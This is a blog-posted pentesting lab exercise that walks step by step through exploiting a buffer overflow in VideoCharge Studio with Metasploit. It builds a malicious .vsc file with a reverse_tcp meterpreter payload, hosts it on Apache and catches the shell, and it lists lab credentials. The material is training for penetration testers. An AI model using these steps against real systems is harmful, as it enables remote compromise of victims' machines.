Powered by Blogger.
Home » » Module 06: Network Penetration Testing Methodology-Internal 11

Module 06: Network Penetration Testing Methodology-Internal 11

Written By AKADEMY on Wednesday, July 3, 2019 | 11:18 AM

Exercise 11: Penetration Testing Buffer Overflow Vulnerability on a Windows Application

Scenario

In computer security and programming, a buffer overflow, or buffer overrun vulnerability appears where an application needs to read external information such as a character string, but the receiving buffer is relatively small compared to the possible size of the input string, and the application doesn't check the size. The buffer allocated at run-time is placed on a stack, which keeps the information for executing functions, such as local variables, argument variables, and the return address. The overflowing string can alter such information. This also means that an attacker can change the information as he or she wants to. For example, the attacker can inject a series of machine language commands such as a string that also leads to the execution of the attack code by changing the return address to the address of the attack code. The ultimate goal is usually to get control of a privileged shell by such methods.
As a penetration tester, you must be able to understand the concept of buffer overflow vulnerabilities and pentest them.
In this lab, you are going to pentest a buffer overflow vulnerability on a windows application and gain access to the system.
Lab Duration20 Minutes
  1. This lab is a part of white box pentesting, where you are informed that there is an application named VideoCharge Studio installed on a system.
    In this lab, we are going to pentest buffer overflow vulnerability present in this application. So, before beginning this lab, we are going to install VideoCharge Studio in the Sales Department Subnet D machine (Windows 10).
    Select Sales Department Subnet D from the Resources pane and log in to it using the credentials Admin/test@123.
    Once you login to the machine, if a Network banner appears at the right side corner of the Desktop, click Yes.
    You can use the Type Password option from the Commands menu to enter the password.
    Screenshot
  2. To install VideoCharge Studio, navigate to \\192.168.168.8\ECSA-Tools\ECSAv10 Module 06 Network Penetration Testing Methodology-Internal\VideoCharge Studio and double-click on VideoChargeStudio_Install.exe to install the tool.
    If a User Account Control pop-up window appears, click Yes.
    If a Windows Security pop-up appears to access \\192.168.168.8, provide Windows Server 2012 (Internal Network)credentials i.e.,
    Username: Administrator
    Password: Pa$$w0rd
    and click OK.
    If an Open File - Security Warning pop-up window appears, click Run.
    Screenshot
  3. The VideoCharge Studio - InstallShield Wizardappears, click Next to continue. Accept the license agreement and then, follow the wizard-driven installation steps to install the application.
    Screenshot
  4. At the end of the installation, click Finish.
    If a Language pop-up appears, click OK(meaning we are selecting English as the default language).
    Screenshot
  5. A VideoCharge Studio Trial version pop-up appears, click on the Quit button to close the window.
    Also, close the navigated window where the installer file is located.
    Screenshot
  6. CLick Kali Linux (Internal Network). If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
    Screenshot
  7. Type root in the Username field and click Next.
    Screenshot
  8. Type toor in the Password field and click Sign In.
    Screenshot
  9. Launch a command line terminal, type msfconsole and press Enter to launch the Metasploit framework.
    Screenshot
  10. Now, we shall search through the msf database for a suitable exploit.
    Type search videocharge and press Enter.
    This returns the exploit(s) related to the application. We will be using this exploit to perform buffer overflow on the application.
    Screenshot
  11. Type use exploit/windows/fileformat/videocharge_studioand press Enter.
    Screenshot
  12. Type set payload windows/meterpreter/reverse_tcp and press Enter.
    Screenshot
  13. Type set lhost 172.20.20.21 (IP Address of Kali Linux (Internal Network) machine) and press Enter.
    Screenshot
  14. Type Exploit and press Enter.
    This creates a malicious payload named msf.vscin /root/.msf4/local folder.
    Screenshot
  15. Now, type use exploit/multi/handler and press Enter.
    Screenshot
  16. Type set payload windows/meterpreter/reverse_tcp and press Enter.
    Screenshot
  17. Type set lhost 172.20.20.21 and press Enter.
    Screenshot
  18. Launch a new command line terminal, type service apache2 start and press Enter to start the apache2 service.
    Screenshot
  19. Switch back to msfconsole, type exploit and press Enter.
    Now the Listener is active and when the payload is executed on the victim machine, then the meterpreter session appears.
    Screenshot
  20. Open a new command line terminal, type mkdir /var/www/html/share and press Enter to create a new folder named share.
    Screenshot
  21. Copy the malicious payload to share folder by executing the following command:
    cp /root/.msf4/local/msf.vsc /var/www/html/share/
    Screenshot
  22. Click Sales Department Subnet D, launch the Google Chrome web browser, type the URL http://172.20.20.21/share in the address bar and press Enter.
    This displays the shared file in the browser as shown in the screenshot below.
    Since this is a lab demonstration, we are directly accessing the shared location from the Windows machine.
    In real-time, attackers might craft similar payloads, share the download link with the victims and entice them into downloading and executing the application, thereby resulting in a reverse shell.
    Screenshot
  23. Right-click on the msf.vsc file and click on the Save link as… option.
    Screenshot
  24. Select Desktop from the left-pane as the download location. Enter msf in the File namefield and click Save.
    Screenshot
  25. You can see the downloaded malicious payload on the Desktop. Now, double-click the msf file and click on Try button to execute the payload.
    After executing msf.vsc payload, a buffer overflow occurs on the application and this leads to windows exploitation, thereby gaining a meterpreter shell for us.
    Screenshot
  26. Click Kali Linux (Internal Network).
    Open the Listener that has been launched earlier in this lab.
    You can see a meterpreter session active.
    Screenshot
  27. Type sysinfo to get the victim machine information.
    Close all the opened windows.
    Screenshot
In this lab, you have learned how to pentest buffer overflow vulnerability on a windows application and gain access to the system.
Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT